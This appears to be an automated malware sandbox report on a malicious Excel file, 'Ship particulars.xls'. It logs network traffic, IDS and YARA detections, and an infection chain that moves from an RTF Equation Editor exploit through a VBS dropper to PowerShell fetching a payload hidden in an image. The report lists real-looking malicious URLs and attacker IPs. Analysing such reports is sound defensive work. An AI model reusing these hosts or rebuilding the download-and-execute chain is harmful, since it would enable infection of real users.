Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80

Networking

Source: Traffic

Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49173

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,

9_2_035B05A1

Source: global traffic

HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 192.185.89.92 192.185.89.92
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /sWel7 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33144/creatingfollowerswithflowereseverytime.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_ygeik543.xh0.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.178.139

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,

9_2_035B05A1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C22A3A6.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sWel7 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33144/creatingfollowerswithflowereseverytime.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_ygeik543.xh0.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: hop.fyi
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br

Source: EQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gif
Source: EQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifM
Source: EQNEDT32.EXE, 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifj
Source: wscript.exe, 0000000A.00000002.431883950.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431709311.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431533301.0000000000546000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.431803798.0000000000548000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431579559.000000000051D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.0000000000546000.00000004.00000020.00020000.00000000.sdmp, creatingfollowerswithflowereseverytime[1].gif.9.dr, creatingfollowerswithflowerese.vBS.9.dr	String found in binary or memory: http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: hop.fyi.url.3.dr	String found in binary or memory: http://hop.fyi/
Source: Ship particulars.xls, sWel7.url.3.dr	String found in binary or memory: http://hop.fyi/sWel7
Source: 92530000.0.dr, ~DF8FA74BFE73643F78.TMP.0.dr	String found in binary or memory: http://hop.fyi/sWel7yX
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.429913988.0000000002E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 0000000C.00000002.429913988.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000C.00000002.429760140.0000000000700000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/i
Source: powershell.exe, 0000000C.00000002.431058539.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;
Source: powershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
Source: powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Source: Ship particulars.xls	OLE: Microsoft Excel 2007+
Source: Ship particulars.xls	OLE: Microsoft Excel 2007+
Source: ~DF669CF6B4D81DE92B.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DFA3F86C325C272D08.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 92530000.0.dr	OLE: Microsoft Excel 2007+
Source: 92530000.0.dr	OLE: Microsoft Excel 2007+

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sWel7.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\hop.fyi.url			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID			Jump to behavior
